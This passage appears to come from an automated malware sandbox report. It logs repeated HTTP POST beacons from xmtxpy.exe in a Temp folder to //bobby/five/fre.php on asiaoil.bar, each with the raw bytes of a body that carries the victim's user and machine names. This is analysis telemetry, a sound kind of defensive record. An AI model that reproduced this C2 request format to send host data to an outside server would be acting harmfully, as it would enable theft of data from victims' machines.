                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:52.079380035 CET393OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:52.182354927 CET393INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:52 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FqldRdslDF9crV%2Bk4ngGcH%2B5VotqLHwZM1hgM1UlLzVHOK203cYnXP5jYPCyykRHqAUueXlxKMSBzyNAjlM%2Fvqw8Nwi0ss%2FzYQhSE9EUH9wjaK0hKyn3kcN4463E9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446836b79922b-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        47192.168.2.2249212172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:53.153614998 CET394OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:53.170088053 CET394OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:53.252991915 CET395INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:53 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yBS7%2BxqKYn8UXFWYtCxhAQUq3wICMu07YMkjyXgzMiD7WnMo34wuo3JBZQt3f%2FvhAz73H9wPdN018HSvgXnDpUBiOvoVzzkvgWsPGM8s4%2F62axP9o7SVvlxiAsFAoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4468a3cbe8fc8-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        48192.168.2.2249213172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:54.210618019 CET396OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:54.227287054 CET396OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:54.306786060 CET397INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:54 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K0AcT1bifDuMhi7ufsGdy3ZWrMEsl7Ml0%2BBsoYKk1Le07SGb1K3vfiYvudRQACEJNwZd7L%2BjjiNvFHdUhY8ZVQ%2FCWgWD2crnmZAbKNk%2BQ47TcQ8b%2FoLYdTuy2B3gQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44690dd409094-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        49192.168.2.2249214172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:55.222618103 CET398OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:55.239134073 CET398OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:55.306236029 CET399INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:55 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2b3lnzs0K50M9KlApGlxtS1%2FGBbpcngBLWZrh0QHIPyWMt9R51HhBbpbNzNiN2fgnCx%2F6Ol9cv3FYjGdC9Z4%2Ff%2B7v%2FeKPnRbogo3FCV4owbNiUoY5%2BcPZ%2FGa%2BNALAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446972bed9091-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        5192.168.2.2249170104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:05.958935022 CET319OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:05.975214958 CET320OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:06.048285007 CET320INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:06 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FkwECIztonU5sKraKeo0SBfQsbzTNEo9c%2Fgv1LcFjyGRwr%2BO5HxPKVAbUysSrtRDLw4YSAITjFTpY93Ba0oLX8DHultt24WrAHZv82zviiHQIIiLmBXtIoOyR3vI7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44563480c9225-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        50192.168.2.2249215172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:56.235039949 CET400OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:56.251535892 CET400OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:56.328077078 CET400INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:56 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lLUedeVgcznC2S%2FUOpbd3fV7v3cGuLCjsT%2FMbiJAVwvVHvZbCBonSZeAGG5JhojOiJyGydHeh3PL5Tp9nmU4EBUX2wVPhLZEEPBr7kenjFn1%2BoSu1sUFZrFUzTyPOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4469d8ada926e-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        51192.168.2.2249216172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:57.354640007 CET401OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:57.370970011 CET402OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:57.520679951 CET402INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:57 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pP7Hm%2FZYo7nBNCdlCm%2B6iCgzILR5XUlKf4GwH1GgSKX5qjvCOl3q7%2FhYlNsVlCRNbRgfIjWoULsECCJWVGVm8TwlUOckIQOjjEp9dOME2g%2F3YvZInDvXJ3pNqXehHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446a48a19903d-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        52192.168.2.2249217172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:58.437792063 CET403OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:58.454149961 CET403OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:58.535232067 CET404INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:58 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B4Hpj5tBS1W25DrOmF70H9%2B7tI00TcoHrZ2vWxTGczWKIQtBUxqfhFCMGDZXE%2FiPTxLHEXRSNrcwpGvMMbC3NGIUBMWmkmFsI9cJLit7sz%2BX56ge756zUtFrYA%2Fn%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446ab4e2a9049-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        53192.168.2.2249218172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:59.543742895 CET405OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:59.559976101 CET405OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:59.660451889 CET406INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:59 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j%2BJFLdnSBYTENDu1tAbRmg3yPPpEafzaD1AIG2OO%2FT%2B%2FQqTuiDGTxzFlf9dnChU0IP%2BEp15Zkavznvg6v0hcTAYsTYetiP8tjAE8TcK4xJqEQeCFqj2PFKCcO8YbOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446b23dcd9241-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        54192.168.2.2249219172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:00.557396889 CET407OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:00.573935032 CET407OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:00.711899996 CET408INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:00 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rk9UBUg8rEXXmstTEerwpTwam6ReU4ftvK8vLG6DGGX39NP0Tj8xTjWk5qWPBqpC6tqrpuX%2FZqaa1n1qmYBhnF44n8KZVoyEqklrYO98Ih0UxdfXxgiW0okoqK2%2FCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446b88b306963-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        55192.168.2.2249220172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:01.628313065 CET408OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:01.648943901 CET409OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:01.731878996 CET409INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:01 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jtSZVRNhVan7fQu%2B%2BS3YF0dvuQRKfPnhQmljq7WJs%2Fj8JMEfpH8AMemLWNbqYw4tgA6v4NG3xTvYc3Z5%2FpGQb5ljWthkbv4uo%2FhbZQYC96NTyl%2B9dg2FM9CZdOcU%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446bf3ee59235-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        56192.168.2.2249221172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:02.628099918 CET410OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:02.645340919 CET410OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:02.733601093 CET411INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:02 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Lp2m%2FnL%2FD9YbbOQL75qiqY1QRie4l95Zh1%2F9JFc7ntQcAGF4IIGoKgD%2F4oPRxszoZK9oVvGOpnhqWzAxSgnH3OqLPGrbcPmuYuhePgMIcrCkD3ZE2%2Bku1MZOs6ktMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446c57aff90af-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        57192.168.2.2249222104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:03.670597076 CET412OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:03.686985970 CET412OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:03.758486986 CET413INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:03 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VTMZeN6TFXbag2y1OBliS7F8Ve1jWw99EUBWoXAAGITxys1b9P94l43Uq0a%2B%2Fvyd8PfkcQkVRk9vtaYxi3J9PRjAhKWq89oNOgEI8T7X4pa5jNQ6EzOTmt9dPn8AJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446cbfd179273-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        58192.168.2.2249223104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:04.661405087 CET414OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:04.677716017 CET414OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:04.741179943 CET415INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:04 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3ixohb6DjBvyEHcF0bBjTjwa28InQY%2BYLPlgexuM%2B84%2F6oOs4V7fazNyzJ4xoT6rgqB9hhVA18VkbtDdbf8imwrd%2Bcpfb9TH%2BBpi1dLQ9%2FLh%2BYjGvjuxWzsCeqqBpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446d23961910a-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        59192.168.2.2249224172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:05.954619884 CET416OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:05.970782995 CET416OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:06.040098906 CET416INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:06 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EE%2FH1l4X4mMaNy6pFboc6LUO8GAlkZzav%2FOZJIxi5sLykIm1li2uICH5vhNS6WFsxhSSyzMACuulnYIlnwvZpCsgsM7VNvUGg6SyBgvKaTyfwg7BclNEWkPSWBEWjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446da4ba95c32-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        6192.168.2.2249171172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:07.006112099 CET321OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
